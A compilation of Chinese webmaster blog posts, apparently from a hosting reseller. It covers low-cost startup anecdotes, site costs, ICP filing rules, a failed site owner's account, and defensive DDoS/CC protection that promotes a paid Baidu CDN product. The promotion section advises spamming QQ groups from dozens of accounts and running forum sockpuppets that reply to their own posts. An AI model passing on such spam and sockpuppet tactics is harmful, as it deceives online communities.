好了以上就是主机吧根据自己的一些经验说了一些有前途的网站类型,我们再来说下哪些网站不能碰? 1 违法类型的网站 随着国内信息大国的政策落地,未来监管只会越来越严,那些违法类型的网站已经很难生存了。 2 版权严重的网站 比如小说、影视,目前是高风险行业,国内已经不只一个站长因为版权问题关闭,甚至被抓了,所以值得警惕。 3 网赚类型 目前网赚类型已经被国内定性为违法网站,国内备案的网站都已经陆续被注销备案,有些网赚项目还涉嫌钓鱼欺诈,所以大家还是少碰为好。   好了,以上就唠叨到这了,希望对一些即将建站的站长有帮助,如果你有什么疑问的,可以一起交流交流。   #### 个人创业迷茫吗 个人创业经验谈 很多人说低成本创业,空手套白狼都是扯淡,没钱什么都做不成。今天分享几个低成本创业,甚至不需要成本创业的思路,请大家鉴赏。 现在大家的问题是怎么用1000元能让自己一年赚50W。乍一看,一年不可能,但是也不要图什么快,干傻事。如果分开看一看,一年要50W,那么每天要賺多少钱呢? 算一算就知道,平均一天赚1400元,一年就能实现50W。那么,一天盈利1400元,怎么办得到? 继续分析,如果一天要赚1400元,一单的利润是14元,那么你一天就要卖100单才能完成任务,如果一单的利润是140元,那么你只需10单就行了,如果一单利润是1400元呢? 一天你只需要出一单,一单是1400元利润就ok了。你又该问了,哪里有一单利润在1400元的?降低点门槛,一单140元可以不?找到产品,琢磨思路,就死磕行不行,真的需要你好好去想,去观察。去测试。懒是永远干不成事的。 以下心得分享: 1、不花一分钱,复制别人的项目赚钱! 有一个小伙,在一家超市门口看见别人搭了个简易台子在卖集团手机充值卡,这种卡就是买100元送100元的,打电话很便宜,不过这种充值卡充的钱,只能打电话,不能发短信。但是也非常吸引消费者。引起很多人围观,很快就卖出去5张了。 小伙子看这人卖得这么快,便趁人家不忙的时候,过去打听打听。因为这个商场还有另外一个出口,如果这个卡很转钱的话,可以在另外的一个出口搭个台子再卖。打听之后得知,买卡的人也是从老板那里批发的,每卖出一张卡可以赚8元,人流量大的时候,1个小时能卖30张,1个小时就能赚240元。 每天这个商场人流量大的时间也就这么几个小时。交完场地租金,每天还能赚1000多元。当然了,这个生意成本比较大,进货的时候一次进了1000张。 这位小伙就跟他商量,让他第二天多带一个台子过来,再多带一些卡,他在超市的另外一个出口帮他卖,每张只需提成5元第二天这小伙就在超市的另外一个出口,卖了五个小时,总共卖出去100来张,就轻轻松松赚了500元。总结一下,不要看到什么就是什么,要善于联想! 这个生意的本质在于,看见别人卖什么卖得好,果断地加入,但是最好不要自己进货,不要自己搭台子,借用别人的货,借用别人的台子,以最小的成本,来借用别人的资源为自己赚钱。 最关键的是,在这个过程中,别人还会告诉你一些宝贵的经验!以后当你走在大街小巷,看见别人卖什么卖得好的时候,不管是人家卖首饰項链,还是卖鞋垫皮带,或者是卖什么狗皮膏药,你都主动过去看看,看看能不能让老板为你垫点货。 你帮他卖,然后给他分点钱,既然人家卖得好,就一定有卖得好的道理,大胆地借他的货,在你们合作的时候,也是在帮他赚钱,他一定会将卖这个货的经验告诉你,这样,你不光卖货赚钱了,还学到了他的经验,这是借鸡生蛋最直接的办法。 2、借开店人的货,为自己赚钱! 朋友开了一个鸭脖子店,但是没有开1个月,因为没有可观的人流量,于是以失败而告终,手头的钱也不多了。有一天他突然想到,他在开鸭脖店的时候,在批发市场进货,认识了几个同样也是开鸭脖店的老板,一交谈才知道,大家生意都不好做。 他在想,能不能找这些老板进货,卖到网吧里面去呢,开始的时候少进点,有了熟人的关系,可以先卖货后付款。风险也不大,关键是不需要自己亲自制作,自己跑跑腿就行了。大家都是熟人,卖完了货再付钱,这些鸭脖店的老板,也很乐意多了这么一个业务员。 于是,他买了一辆二手电动车,上各大网吧去卖鸭脖,鸭腿,鸭肠等等,卖出去多少,再给老板分一部分利润。那种大点的网吧,每个网吧卖出去20个鸭腿,就能挣40元,给老板分10元,还剩30元。一天跑10家网吧,也能赚300百元。要是在勤奋点,就能多赚更多了。 开店的人开的店是死的,不能移动,都是等顾客上门,我们为何不能成为他们的腿,让他们的产品到达应该到达的地方?以后走在大街上逛街的时候,看到你比较感兴趣的店,你都想想能不能让他们的产品加上你的腿,到达各个消费者聚集的地方。 很多东西只是你没有去想,或者想了没有去做,才导致你现在依然一无所有。想知道你未来什么样,很简单,就看你现在在做什么就能知道。 要把思维放开,放大,真正的赚钱高手都是无中生有的,如果你现在银行里只有1W元你一年没有做生意变成10W,那就算给你100W,你一年都未必能转到钱。在没钱的时候最能看出一个人的洞察力、嗅出商机的能力、还有执行力。 如果你混得很差,你感觉到身边到处都是装逼的人;如果你混得好点儿,看谁都顺眼。你觉得社会就该是这样。有时候我们看啥都不顺眼,不是我们修养不够,是我们混得太差,老是生活在一个失败的环境中,自然看什么都是负面。物质决定意识,环境影响人。 机会压根不是等出来的,是干出来的,不去尝试永远都没机会。任何事情都要先干起来再说,边干边找机会,边干边创造,边干边修正,边干边完善,只要大方向对,也许最初看起来没希望的事儿,也能开花结果。人生不需要太多等待,有些事儿,想好了就甩开膀子干,也许人走了,心里也没那么多遗憾... 項目不在多而在精,看到一些朋友做項目,一个接着一个,猴子掰玉米,做一个扔一个,做了很多項目,结果却没有转到什么钱。做項目要找到自己有感觉的,而且利润非常高的,这样付出回报才成正比。切记! 你要想有学问,就要多跟有学问的人交朋友;你要想有钱,就要多跟有钱的人交朋友;你要想投 资 理 财,就要多和投 资 理 财的高手交朋友;你要想做老板,就要多和老板们交朋友。 创业其实不难,可一提到创业,总会听到这样那样的。有的人说我没本钱啊,有的人说我啥都不懂啊,有的说我不知道干啥啊,有的说我有老婆孩子亏本了怎么办啊,你就听吧,都是谈困难的,很少有想方法的。 这是最好的时代,也是最不好的时代。这个时代,国家四处充满了商机。任何社会都没有绝对公平的,再说了,这是社会现实,你能改变得了吗?肯定改变不了。那好,改变不了,你就别去抱怨什么,审视自己,改变自己总是可以的吧。就算别人先天有钱,有地位,你可以用自己的勤奋和智慧,来后天追赶嘛!无论咋样,你都得活着,那为什么不活的积极一点,精彩一点呢? 想创业的人,大致分为几种,有些人想开个小店,接着就想到了租房、装修、进货、招人,得多少银子啊? 有些人想开个公司,接着就想到了注册公司,租办公室,买办公用品,招人,呵呵,真是屎没来屁先来了。这些都是正常的思维,对于资金充足的人来说,都是必须的。 可是对那些没啥资金,没啥经验的初次创业者来说,你这么折腾完了,估计手头那点钱早就没了,而正式业务还没开展呢,没经验失败了,估计又返回贫困一族啦。 有些人一开始创业,就想到省心。这个我就不理解了,天下有省心的时候吗?有,那是见上帝以后。迎合这部分的心态,连锁的信息满天飞。我告诉你,网上出现的加连锁广告,可以说,绝大部分都是骗的。那不是让你省心,是让你伤心啊。 因此,创业要勤奋,动脑,禁得住诱惑,做靠谱的事情,从小钱开始转。 第一次选择項目,尽量选择你能把握的,也就是适合你的,风险很低,容易操作的項目,不要考虑什么天长地久,记住,你有钱了以后,可以随时调整項目。第一次,从练手的思维去考虑,从赚钱的角度去考虑,而不是从长久的角度考虑。 选择項目的时候,把自己的思维要尽量打开,商机无处不在,满足一个小小的需求,就是你赚钱的开始了。 一个在地摊上认识的朋友,下岗后,没有了生活来源,就晚上到夜市上摆个摊,转点零花钱。朋友是一个很有自尊的人,他想我这样也不是办法啊。 一次,我们喝完酒后,他说请我上网吧打游戏去。好吧,也都无聊。我们来到了一个网吧,开了两台机器,打了一会游戏后,肚子有点饿了,到前台一问,除了饼干,面包,其他吃的没有。只好忍了。回来的路上,我打趣到:哥们,你到网吧卖盒饭吧,应该有市场。 说完了我也没在意,过了两天,他说找我商量点事,原来他真想在网吧卖盒饭,这两天做了下调查,觉得有市场。让我帮他参谋一下。呵呵,分析了一下,我们觉得网吧上网的人群,消费能力不是很强,因此价格不宜定的很高,男孩子多,因此,饭量要足。 综合以后,我们把价格定在7元,饭量足,卫生干净,菜品主要有肉末茄子,干豆腐,宫保鸡丁等几样。就这样,创业开始了,他老婆做饭菜,他打下手,更多的时间去和网吧老板谈合作,就是卖一盒给提成1元,有的一块五。算一下,他一盒饭的成本基本控制在三元之内,除了给网吧提成的,加上其他损耗,他一盒饭的利润在2元左右。 谈谈一点大学生创业的事情,对于刚毕业的大学生,我还是建议你先到企业打工个一年半载,这是最少的时间了,即使你有创业的想法 。 在这个过程中,你不要在意薪水的多少,不要在意安逸与劳累,你要尽可能多的学习企业管理流程,学习你的上司是怎么管理的,好的地方你要牢记,不好的地方你也要心中有数。 等你以后自己创业的时候,这段打工的生涯会给你很大的帮助。我那时候属于在校创业,一直没打过工,这让我在企业管理上走了很多弯路,吃了不少苦头,凡事都要摸着石头过河,浪费了不少时间。因此建议刚毕业的学生朋友,先打工一段时间,然后考虑创业。 #### 个人博客网站怎么做?搞个网站需要多少钱? 制作个人博客网站的费用取决于许多因素,包括你选择的域名、主机空间、网站建设方法以及可能的后期维护等。以下是一些大致的费用估计: 域名费用:域名是你的网站的唯一标识,通常需要每年支付一定的费用。根据搜索结果,一级域名的年费大约在80元左右。 主机空间费用:主机空间是存放你网站内容的地方,你需要根据你的网站规模和预计的流量来选择合适的主机空间。如果你选择的是免费的主机空间,那么这部分的费用几乎可以忽略不计。 网站建设费用:如果你选择雇佣专业的网站建设公司来制作你的网站,那么这部分的费用可能会较高。根据搜索结果,定制的网站建设费用一般在7-10K左右。 后期维护费用:网站的后期维护可能包括定期更新内容、修复漏洞、备份数据等,这些都需要一定的费用。如果你选择的是自助建站平台,那么可能不需要额外的维护费用。 值得注意的是,以上的费用只是一个大概的估计,实际的费用可能会有所不同,具体的费用需要根据你的实际需求来确定。如果你打算自己动手制作网站,那么可能会省下部分的费用,但相应的,你需要投入更多的时间和精力。 另外,如果你打算自己购买域名和服务器,那么你可以选择一些知名的域名和服务器提供商,如阿里云、腾讯云等,他们通常会有优惠活动,可以降低你的成本。 总的来说,制作个人博客网站的费用取决于许多因素,包括你的预算、你的技能水平、你的需求等。你可以根据自己的实际情况来做出最适合自己的选择。 #### 个人博客网站被ddos攻击怎么办?被cc攻击怎么办? 现在运营个人博客已经越来越少了,主要是国内大环境下,内容审查越来越严,而且流量获取也不大容易了,而最让个人站长恶心的是,自己的个人博客还时常被攻击,DDOS/cc攻击一点没少,主机吧自开博以来,就受过几次攻击,不过都被主机吧解决了。 今天主机吧就根据自己的经验给大家说说如何解决ddos/CC攻击问题。 被DDOS攻击 被ddos攻击的后果就是IP进黑洞,我们首先要处理的就是等IP恢复后给服务器换个新IP,如果换不了IP,那就只能换服务器了,然后给网站套上CDN,把源IP隐藏起来,这样黑客找到源IP,自然无法进行DDOS,当然你得给网站上高防CDN,普通CDN一样会被DDOS,而且会产生巨额流量,已经不只一位客户因为使用CDN被攻击导致产生大量欠费了。主机吧自己使用的是百度云加速,百度云加速是高防CDN,而且是按套餐计费的,不会有后期付费问题,所以比较安全。 2.被CC攻击 CC攻击不像DDOS攻击那么简单粗爆,CC攻击是通过不断的非法请求网站,导致服务器CPU占满,影响网站访问。对网站来说,CC攻击往往杀伤力更大,因为CC攻击成本低,时间长,主机吧就有客户连续被攻击了两个月,每天都持续几个小时。所以防CC是一件持之以恒的事情。要怎么解决CC攻击呢?如果是小型CC攻击,而且攻击特征非常明显的,一般给服务器装个防火墙就可以搞了,如安全狗、云锁之类的,甚至宝塔面板里的防火墙就可以搞,但是这些只是软件而以,对于一些大型CC攻击是没有任何效果的,因为你服务器本身配置并不足以支撑这么大攻击量。所以我们还是需要外部服务来解决,购买高防IP或者高防CDN,主机吧认为高防CDN最经济的方式,比如百度云加速,可防超大型CC攻击,主机吧就曾利用百度云加速商务版防御下4亿峰值攻击的CC攻击。 总之,只要找对路子,不管是DDOS还是cc攻击,其实防御起来并不难,而且成本也不高,如果你网站有攻击的可以联系主机吧帮你防御。   #### 个人备案可以备哪些内容网站可以通过备案 个人备案是一件挺麻烦的事,因为备案管局对个人备案的内容要求特别严,稍微有些不合适就会出现审核不过的情况,今天主机吧来说下个人备案可以备哪些类型的网站,希望可以帮助大家。 一、个人可以备案网站的内容: 1.个人博客(个别地区需要办理审批文件) 2.网址导航 3.个人作品展示(绘画等) 4.文摘 二、个人不能备案的网站类型: 1.不能备案含有企业、行业类信息的网站 2.不能备案论坛网站 3.不能备案经营类,涉及金钱交易的网站,例如购物、团购类 4.不能备案社区类网站 #### 个人小网站如何抵御DDOS攻击 在当今数字化时代,个人小网站也面临着各种网络安全威胁,其中DDoS(分布式拒绝服务)攻击尤为常见和破坏性。对于资源有限的个人网站所有者来说,预防和应对DDoS攻击是一个重要课题。本文将从多个方面详细解析如何有效抵御DDoS攻击。 DDoS攻击简介 DDoS攻击通过大量无效请求占用网络资源,导致正常用户无法访问网站。攻击者通常利用多台被控制的计算机同时发起攻击,使得目标网站瘫痪。 隐藏服务器真实IP 避免暴露服务器真实IP是抵御DDoS攻击的重要步骤之一。使用CDN(内容分发网络)可以隐藏服务器的真实IP地址,同时提供额外的防护层。例如,使用百度云防护或京东云星盾等高防CDN服务,不仅可以减轻服务器负担,还能提供DDoS防护能力。 定期更新系统和软件 保持服务器操作系统和应用程序的及时更新至关重要。许多DDoS攻击都是利用已知漏洞实施的,因此及时打补丁可以消除许多潜在的安全隐患。此外,关闭不必要的服务和端口,减少攻击面,也是有效的预防措施。 配置Web应用防火墙(WAF) 使用Web应用防火墙(WAF)能够检测并拦截恶意流量,保护网站不受SQL注入、XSS等攻击。一些流行的WAF工具如ModSecurity和AWS WAF,可以帮助个人网站主监控和过滤异常请求,从而提升整体安全性,如服务器不具备安装本地WAF的能力,也可直接部署云WAF,如百度云防护就是云WAF服务,免安装,可有效拦截SQL注入、XSS等攻击。 限制请求速率 通过配置服务器或使用第三方插件限制单位时间内的请求数量,可以有效防止DDoS攻击。例如,可以使用Apache的mod_ratelimit模块或者Nginx的limit_req指令来控制每个IP地址的请求频率,从而减少洪水攻击的影响。 采用高防服务 对于经常遭受大规模DDoS攻击的目标,可以考虑采用专业的高防服务。这些服务提供大规模的带宽和先进的防护机制,能够有效吸收和抵御大流量攻击。例如,阿里云和腾讯云都提供高防IP服务,虽然成本较高,但能有效保护网站稳定运行,也可以采用主机帮的第三方云高防御方案,采用高防IP或者高防CDN防御DDOS攻击。 数据备份与应急响应计划 无论预防措施多么完善,DDoS攻击仍然有可能发生。因此,制定详细的应急响应计划非常重要。这包括定期备份网站数据、准备好切换到备用服务器、以及建立快速恢复业务流程的方案。一旦遭受攻击,可以迅速采取行动,最大限度地减少损失。 监控与日志分析 持续监控网站的流量和性能,及时发现异常情况。使用工具如Nagios、Zabbix等监控系统,结合日志分析,可以帮助识别潜在的安全威胁。通过分析日志,可以发现攻击模式,调整防护策略,提高应对效果。 教育和培训 人为因素往往是安全链条中的薄弱环节。对网站管理员进行安全教育和培训,提高他们的安全意识和技能,有助于减少因操作失误导致的安全问题。了解基本的网络安全知识和应急处理流程,可以在关键时刻发挥作用。 法律手段与合作 遭遇DDoS攻击后,可以向相关执法机构报案,寻求法律援助。此外,与其他网站管理员和安全专家建立联系,分享信息和经验,共同应对DDoS攻击。合作可以提高整体防御能力,形成更加坚固的安全屏障。 综上所述,个人小网站可以通过多种策略有效抵御DDoS攻击。从隐藏服务器真实IP、定期更新系统和软件、配置WAF、限制请求速率、采用高防服务、备份数据、监控与日志分析、教育培训到法律手段与合作,综合运用这些方法,可以显著提升网站的安全防护能力,确保网站的稳定运行。 #### 个人小网站是怎么防止网站被攻击? 在当今数字化时代,网络安全已成为网站运营不可忽视的重要环节。特别是对于个人小网站而言,由于资源和技术限制,往往更容易成为黑客攻击的目标。本文将详细介绍个人小网站如何有效防御各种网络攻击,确保网站的安全稳定运行。 一、了解常见攻击方式 要有效防御网络攻击,首先需要了解常见的攻击方式。这些包括但不限于: DDoS攻击:通过大量无效或恶意请求占用服务器资源,导致正常用户无法访问。 CC攻击:模拟多用户访问,使服务器过载,主要用于攻击Web应用。 SQL注入:攻击者通过网页的输入框向后台数据库注入SQL命令,获取或破坏数据。 XSS攻击:跨站脚本攻击,攻击者利用网站漏洞将恶意脚本植入网页,当其他用户浏览时执行。 文件上传漏洞:允许攻击者上传恶意文件到服务器,进而控制网站或窃取数据。 弱密码攻击:利用简单或常见的密码进行暴力破解,获取账户控制权。 二、防御策略 针对上述攻击方式,个人小网站可以采取以下防御措施: 定期更新与打补丁:确保网站系统、软件和插件都保持最新版本,及时安装安全补丁以修复已知漏洞。 使用WAF(Web应用防火墙):如百度云防护,它可以有效拦截恶意流量,保护网站免受SQL注入、XSS等常见攻击。 限制IP连接数:配置服务器限制单个IP地址的连接数,降低DDoS攻击的风险。 设置复杂密码:要求用户设置复杂的密码,并定期更换,以防止弱密码攻击。 禁用不必要的服务和端口:关闭不需要的服务器端口和服务,减少潜在的攻击面。 启用HTTPS:通过SSL证书加密数据传输,提高数据安全性。 备份与恢复计划:定期备份网站数据,并制定详细的恢复计划,以便在遭受攻击后能迅速恢复。 监控与日志分析:实时监控网站流量和异常行为,定期分析日志以发现潜在的安全隐患。 三、推荐使用百度云防护来防御网站攻击 在众多网络安全产品中,百度云防护因其高效、易用且性价比高的特点而备受推崇。以下是使用百度云防护来防御网站攻击的具体步骤: 接入百度云防护:首先,需要在淘宝店(https://zhujib.com/shop/26864.html)购买百度云防护服务。按照提示完成域名解析和接入配置。 创建防护模板:登录百度云防护控制台,进入“配置中心”的“防护模板”页面,创建适合自己网站的防护模板。根据需要开启不同的防护功能,如CC防护、区域黑名单、访问频率限制等。 自定义防护策略:针对特定业务场景和安全需求,自定义访问规则和防护策略。例如,可以针对特定URL路径设置访问频率限制或IP黑白名单。 开启超级严格模式:在遭遇CC攻击时,可以开启超级严格模式以增强防护效果。该模式下所有访问请求都将经过严格的挑战验证才能放行。 监控与优化:利用百度云防护提供的实时监控和日志分析功能定期检查防护效果并根据需要进行调整优化。同时关注官方发布的安全动态和更新信息以便及时应对新的威胁和挑战。 四、结论 个人小网站虽然资源有限但同样面临严重的网络安全威胁。通过了解常见的攻击方式并采取有效的防御措施可以大大降低被攻击的风险。其中使用百度云防护等专业的网络安全产品可以提供更加全面和高效的防护能力是个人小网站防御网络攻击的理想选择。 #### 个人站长失败案例三年网站没盈利是该放弃还是坚持? 如果是三年前的自己,根本就不会想过三年后会是这个样子——运营三年一分钱都没有赚到。服务器成本、域名成本等硬性成本全部都是自讨腰包。其他人工推广维护根本就无法计算。 今天,三年前的续费即将过去到期,开始思考着自己是该继续续费还是放弃。 叹屌丝逆袭多么的艰难。一开始想的是多么的美好。“建立一个内容丰富的网站,有图片、文字、聊天、交友。运营一段时间内流量上来了就挂谷歌adsense赚取点费用维持服务器成本。后期通过这个网站盈利,想着日赚XXX的美梦。”但是没有想过结局跟网上吹的那种日赚XXX是多么的天壤之别。 (博文配图,图片与作者本文无关) 第一年: 挂adsense,半年多了还不到100人民币,点击单价越来越低而且要多低就有多低,基本上等于免费挂谷歌的广告。虽然网站流量每天在1K,PV在2K左右,但对于盈利仍旧是无计可施。百度收录有谷歌收录访客有流量但是根本就赚不到钱。看到这样的情况,满腔热情有点被泼冷水的感觉,但是还是坚持,心里想着是网站挂着又没事。 第二年: 很悲催,谷歌adsense不给任何理由就把我的网站域名给封了。之后我想过去挂百度联盟的广告,很可惜,没有备案网站是放不了百度的联盟广告的。还有其他的联盟比如阿里妈妈,根本就不用去挂的。网站每天没有几千几万流量,挂几十年收入都是0!剩下的其他一些杂乱的广告联盟商,不想去浪费时间,看到他们的广告感觉很低俗、如果网站上面挂了那样的广告给人的感觉就是一个s情h站!都是些卖w哥、壮阳、或者luo聊、同城交友(那种)、游戏弹窗,挂马的广告。如果放这样的广告到自己的网站上,只能是饮鸩止渴。很悲催的,服务器费用仍旧是自己掏腰包。而且已经一种不管他的状态。 第三年: 很多人都说如果一个网站已经运营了超过2年还是不盈利,那么这个网站可以关闭了。现在想起来,觉得确实是的,2年的时间,已经不是新站了。但是仍旧不是盈利状态,只能说明运营不善。第三年里面很心灰意懒,不想去给网站加什么内容,只是定期备份,检查网站是否可以正常使用是否可以正常运行。访问流量还是那样差,每天才2K IP左右。雪上加霜的是在2012年六七月份的时候,百度k站了,流量直线下降90%。后来虽然收录上回升了一半,有1万多。但是每天来自百度的流量始终都是0,切切实实始终都是0。没有流量,更别提盈利,让自己更觉得心灰意懒。 第四年:今年现在2013。 静下心来思考,开始反思。想到了自己为什么要做这个网站,觉得有点可笑,一开始想着通过运营网站赚钱,结果却是一直都是自掏腰包赔本。自己该继续运营下去还是直接放弃?不由得想到了网站的最终结果:收点小钱而已,不用自己掏腰包去垫付服务器的成本费和域名的注册费。 自己该继续坚持下去吗? 跟别人交流了很多次,把网站给了很多人看。 很多人打开一瞪眼就说网站太丑了,一个图片都没有,一个动画都没有,不想继续访问下去,想直接关闭。有的人说访问速度太慢了。其实是因为我网站没有beian,只能放在国外,虽然已经算是最快的服务器了,但是访问速度还是很慢。没有办法,自己网站一直都是不盈利不赚钱,哪有那么多钱去升级服务器买好的服务器?也给了一些SEO人士看,都说出来的是网站没有外链,很少。基本上没有在外面宣传推广过一样。因为自己没有那么多精力去推广,只能三天打鱼两天晒网。 网站运营的第四年,也许自己已经明白了这个网站为什么一直都是这么没有起色,没有流量也没有收益。看到很多域名注册不到1年的网站流量、收录都异常火爆、权重非常高,让自己觉得奇怪,自己一开始认定的域名越老越权重高,而自己的网站已经运营了三四年了,百度权重还是0、谷歌pr也从原先的2降到了0。 回想自己这三年来的付出,经常熬夜通宵达旦的修改网站程序源码,基本上已经把网站源码改得地覆天翻。经常为了调节一个细小的代码优化而废寝忘食、甚至一整天坐在电脑前一动不动,没时间上厕所没时间吃饭睡觉洗漱。等于就是在自己做一个PHP CMS系统。但是网站做好之后就坐等搜索引擎收录,靠天吃饭一样,搜索引擎那天心情不好自己就一个字都别想了。发现很多网站他们的程序根本从来都不改动一下,直接CMS下载来加内容,域名也注册不到1、2年,但是流量收录PR权重非常高、人气非常火爆。对比之下,自己显得多么相形见绌,开始深刻的怀疑一开始自己信定的域名越老人气越旺的谬论。 打开自己的网站,发现网站界面确实是那么的丑陋,因为自己不会PS不会图片处理,也不会仿站,所以网站界面一直都是那么的丑陋,以前给别人看自己的网站,也许这是大部分写代码的人的不足之处,不会设计界面,不会美工。 思考、总结了很多,明白了自己失败的所在: 一网站界面太丑陋,不会美工设计、logo都是非常难看的。 二从来没有推广宣传过只是坐等搜索引擎收录,靠天吃饭。 三网站服务器太差,舍不得升级好一点的。死做站,只会改程序而其他的根本就从不顾及。 四从来没主动去寻找过广告商,日IP 2K其实挂一个其他的广告就可以满足服务器费用了,但是没有去寻找也丢失了盈利的欲望。 网站已运营三年,败在了方向上。很少推广……唯一做得最多的就是程序,死改、死改!完全的倾向与技术性。死改程序死改程序,死读书一样。 但是我该继续下去吗? 很多科学的统计,中国的个人站长至少80%都是不盈利,任何费用都是自己出,其他人工的维护、推广宣传人力精力更不包含在内。另外10%是勉强可以赚得点服务器费用和域名费用。只有剩下10%不到的才收入大于支出,但是剩余不一定抵得上他的其他付出——时间精力人力推广。 同时也想到了自己网站,主题主题、发展模式要被复制太容易了。个人站长真的力量太薄弱,有什么变动,就立即会夭折。一切都是迷路。感言:个人建站小打小闹还可以但是真的想通过建个网站来运营就逆袭,只能是想的太离谱。 #### 个人站长的没落?站长帮手网关停了! 近日,在卢松松博客看到一篇关于站长帮手网倒闭的文章,说实在话很震惊和惋惜,目前站长帮手网已经几个月打不开了。 站长帮手网是国内最早一批关于站长工具类的网站,提供域名收录查询、PR、友链链接检测等SEO工具。主机吧很久之前刚做站的时候还是用站长帮手网来查询信息的,站长帮手网那时候功能比站长之家的好用。然而多年过去了,站长之家都上市了,连最早友链的卢松松博客都成立公司了,而站长帮手网却没落到卖站倒闭的地步,不得不让人感到唏嘘。 也许站长草上飞已经做其它的了,毕竟人家挺牛的。 模糊的站长手网截图 #### 个人站长的自述:个人做站太难了,坚持不下去了 五年前用阿里,告知网站内容不符合个人网站内容,改腾讯云,因为备案问题转到景安,景安太贵,前年又返回腾讯云(之前在这几个idc都有过接入,前几年可以任意转)。 月初腾讯云备案部门打来电话,说之前备案留的ip和目前使用的不符,要求变更,按要求来吧,提交申请又告知域名在国外,不支持备案,除非转回来,花了1周把域名从namecheap转到腾讯云,再次申请备案变更,刚电话打过来,六点修改建议,域名刚转回国要等3天,地址和身份证地址差一个字,紧急联系人最好写自己手机(之前要求我增加)。 网站名称“精打细算”属于成语,个人不能用,网站内容涉及优惠券,不属于个人网站类型,个人网站内容只能是记录,日志,要求整改,否则管局通过不了。做了十年的站,几乎没有间断到每天更新,赚的还没有民工多,现在限制这么多,真的心累! 来自十年老站长的自述 #### 个人网站推广的N种方法 1、回答类网站推广 在一些知识类、知道类网站,例如搜搜问问、百度知道、新浪爱问等,回答别人的问题。或者自问自答。 2、百科网站推广法 到互动百科、百度百科、搜狗百科等网站添加内容(以及百度地图、搜狗地图等)。 3、分类信息网站推广法 例如到58同城、赶集网、百姓网等分类信息网站,发布你的企业网站信息。 4、QQ群网站推广法 (1)准备好你的网站地址和网站简介。 (2)申请几十个qq,每个qq加入几十个群,每天发一遍网站。平均 50个qq*每个qq加入50个群*每个群50个人=75000人观看。如果qq更多,加入的群更多,加入的是大群,每个群的人数更多,则宣传效果更好。即使排除不在线的qq用户,效果也不容低估。要忍辱负重,不怕被踢。 5、图片打水印推广法 找一些好看、好玩的、时事的图片,例如最近战狼2大火,很多人关注,这时候可以找一些跟战狼2、吴京相关的图片,使用水印工具打上你公司的网址,然后发到各个QQ群,这样很多人就会把这些图片进行转发,起到很好的宣传效果。 6、软文推广法 写一些文章,或者引用一些好的文章,巧妙的加入网站网址。这个要有点写作基础,写得好网民才会看,才会传播得更广,效果就更好。 7、博客推广法 写了软件,需要有地方发表。一个是给各大门户网站投稿,另外就是在论坛发帖,再者就是发到自己的博客里面,发到博客有个好处,就是不会被删除。 8、论坛发帖推广法 注册几十个几百个论坛,每个论坛注册几十个帐号,把签名设为你在企业网站的网站标题,自己顶自己帖子。注意换马甲,发布有争议性的标题内容,好的标题是论坛推广成败的100%。这里说的论坛是指泛论坛,包含留言本、论坛、贴吧等等一切网民可能聚集的地方。 9、微博推广法 在各大微博网站注册微博帐号,使用系统提供的文章微博分享功能和产品微博分享功能,将你的网站的文章和产品分享到各大微博,共享各大微博千万级流量。 10、签名档推广法 把你的QQ、微信、陌陌、旺旺等聊天工具的签名档都改为你的网站名称和网址,例如:欢迎大家光临XX网(网址) 11、名片、宣传页推广法 把你的网址印在你的名片、宣传页等一切你能够掌握的单页上,派发给客户。 12、交换友情链接推广法 这是最原始的网站推广网站,你可以找一些你熟悉的行业网站,跟他们沟通交换链接进行推广。 13、无偿单向链接网站推广法 无偿给其他网站做链接,既能丰富自己网站的信息,而且在网民搜索别的站的时候,又可能出现自己的网页结果。 14、发布任务推广法 在威客网站发布任务,不仅能够吸引接受任务的人,而且能够吸引一大批旁观者。要充分利用这种一对多的传播优势。 15、发布兼职推广法 在兼职网发布兼职,不仅能够吸引申请兼职的人,而且能够吸引一大批旁观者。 16、人才招聘推广法 在人才招聘网站上发布人才招聘消息增加百度收录曝光的机会,也可能增加潜在客户对公司实力的认可度。 17、口碑推广法 把网站内容做好,让用户主动传播你的网站,这个要求你的网站有足够的吸引眼球的能力,对网站内容编辑的要求非常高。 18、电子邮件落款中加网址推广法 别忘了在电子邮箱的设置里设置一下签名档。以后发邮件就会自动加上,无形中带来不少曝光机会。 19、自媒体平台推广法 像搜狐自媒体、百度百家号、企鹅自媒体平台等都是支持文章放域名地址的,只要文章写好,曝光率大大增加。   20、未完代续,欢迎大家分享   #### 个人网站,博客都在分享什么内容? 个人网站和博客的内容非常多样化,主要取决于博主的兴趣、专业领域和分享目的。根据搜索结果,以下是一些常见的分享内容: 技术和编程知识:许多博主分享与编程语言、软件开发、网络安全等相关的技术文章和教程。这些内容可能包括代码片段、项目构建指导、技术分析等。 个人经历和生活感悟:有些博主使用个人网站记录日常生活、旅行经历、读书笔记或者个人成长的故事,这些内容通常具有较强的个人色彩和叙事性。 专业见解和行业分析:专家和行业从业者可能会在个人博客上发表对特定行业趋势的分析、市场研究报告或者专业评论。 教育和培训材料:教师、讲师或培训机构可能会利用个人网站提供教学资源、课程大纲、在线辅导等教育相关内容。 创意作品集:设计师、艺术家或摄影师等创意工作者可能会展示他们的作品,包括图形设计、插画、摄影集等,并分享创作过程和灵感来源。 产品评测和推荐:科技爱好者或产品评测员可能会对最新的电子产品、软件应用进行评测,并给出个人推荐。 健康和健身指导:健身教练、营养师或对健康生活感兴趣的博主可能会分享饮食计划、锻炼技巧和健康小贴士。 语言学习资源:语言学习者或教师可能会提供语言学习材料、教学视频、词汇表和语法讲解等。 个人网站和博客的内容不断更新,反映了博主的最新思考和活动。通过这些平台,博主能够与全球读者建立联系,分享知识,并获得反馈。 深入研究 如何选择个人网站或博客的主题以吸引更多读者? 选择个人网站或博客主题的策略 选择个人网站或博客的主题时,应考虑以下几个关键点以吸引更多读者: 确定目标受众:明确你的内容是为哪个群体服务的,这将帮助你更好地理解受众的兴趣和需求。 聚焦时事热点:关注当前的社会动态和流行趋势,这样的内容更容易引起读者的共鸣和兴趣。 提供有价值的内容:确保你的文章能够为读者提供实用信息和解决方案,这样可以增加内容的吸引力和分享率。 精心构建开篇:一个引人入胜的开头能够激发读者的好奇心,鼓励他们继续阅读。 使用生动的语言:富有表现力的语言和形象的描述可以帮助读者更好地理解和感受你的内容。 结构清晰:合理的段落划分和逻辑结构有助于读者更轻松地消化信息。 增添多媒体元素:图片、视频等多媒体内容可以显著提高文章的吸引力和互动性。 与读者互动:积极回应读者的评论和问题,建立良好的读者关系,促进社区的形成。 持续更新内容:定期发布新内容可以保持读者的兴趣和网站的活跃度。 持续优化和创新:随着市场的变化,不断调整和改进你的内容策略,以保持竞争力和吸引力。 